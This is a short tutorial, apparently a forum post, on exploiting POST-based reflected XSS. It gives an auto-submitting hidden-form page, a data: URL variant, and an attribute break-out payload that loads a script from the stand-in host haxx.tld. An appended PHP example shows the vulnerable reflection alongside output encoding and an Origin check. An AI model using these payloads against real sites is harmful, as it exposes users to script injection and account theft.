When the vulnerable script reads the $_POST['var'] variable, so that content can only be submitted via POST requests, the way to exploit POST-based XSS is to create a malicious HTML page that sends the user to the target site and submits a malicious script on the user's behalf.
The link will of course point to a server you control, and it could be a shortened URL. When the user visits your server, the POST data is instantly sent by the user's browser to the target site, and the target site responds to the user.
This means that even though the user visits your site first, which may feel "malicious" to the user, the user lands on the target site, where the URL field shows the site's own domain name. It could even say https with the blue background behind the favicon, making most users quickly forget they ever came by your server. After all, if your server responds fast, the redirect takes a second or less, which most users may not even notice.
As it's a fun challenge, build a .html document, such as:
<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>
If you want to test it in the URL address field in Firefox, just type this in:
data:text/html,<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>
Of course, you have to edit the following fields: "action", "name" and "value".
If you need to use " to break out of a form or whatever, then value="XSS" should of course be e.g. value='XSS' instead, such as: value='"><script src="http://haxx.tld/.j"></script>' and so forth.
Enjoy and merry X-mas
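
The server side of the technique above, as an added example that is not part of the original post: a script that reflects $_POST['var'] unencoded, next to a version that encodes on output and rejects POSTs whose Origin header is not the site's own. The function names, the SITE_ORIGIN constant and the sample request are assumptions made for illustration; targetsite.tld is the placeholder host used above.

```php
<?php
// Added example, not code from the original post. Names and inputs are constructed.

const SITE_ORIGIN = 'https://targetsite.tld'; // placeholder host from the text above

// Vulnerable pattern: the POST value is written into an attribute as-is,
// so a value containing "> closes the attribute and the tag.
function render_unsafe(array $post): string
{
    return '<input type="text" name="var" value="' . ($post['var'] ?? '') . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both " and ', ENT_SUBSTITUTE replaces invalid UTF-8.
function render_safe(array $post): string
{
    $raw = $post['var'] ?? '';
    if (!is_string($raw)) {          // var[]=x would arrive as an array
        $raw = '';
    }
    $value = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="var" value="' . $value . '">';
}

// Defence in depth: a form auto-submitted from another site carries that
// site's Origin, and a form submitted from a data: document sends "null".
// Assumption: POSTs without an Origin header are rejected as well.
function is_same_origin_post(array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return true;                 // only POST requests are checked here
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return is_string($origin) && hash_equals(SITE_ORIGIN, $origin);
}

// Constructed sample request: attribute break-out value, sent from a data: URL.
$post   = ['var' => '"><i>probe</i>'];
$server = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'null'];

echo render_unsafe($post), PHP_EOL;  // markup from the value ends up in the page
echo render_safe($post), PHP_EOL;    // value stays inside the attribute
echo is_same_origin_post($server) ? 'accept' : 'reject (cross-origin POST)', PHP_EOL;
```

Output encoding is the actual fix for the reflection; the Origin check only stops the cross-site delivery step and should not be relied on alone.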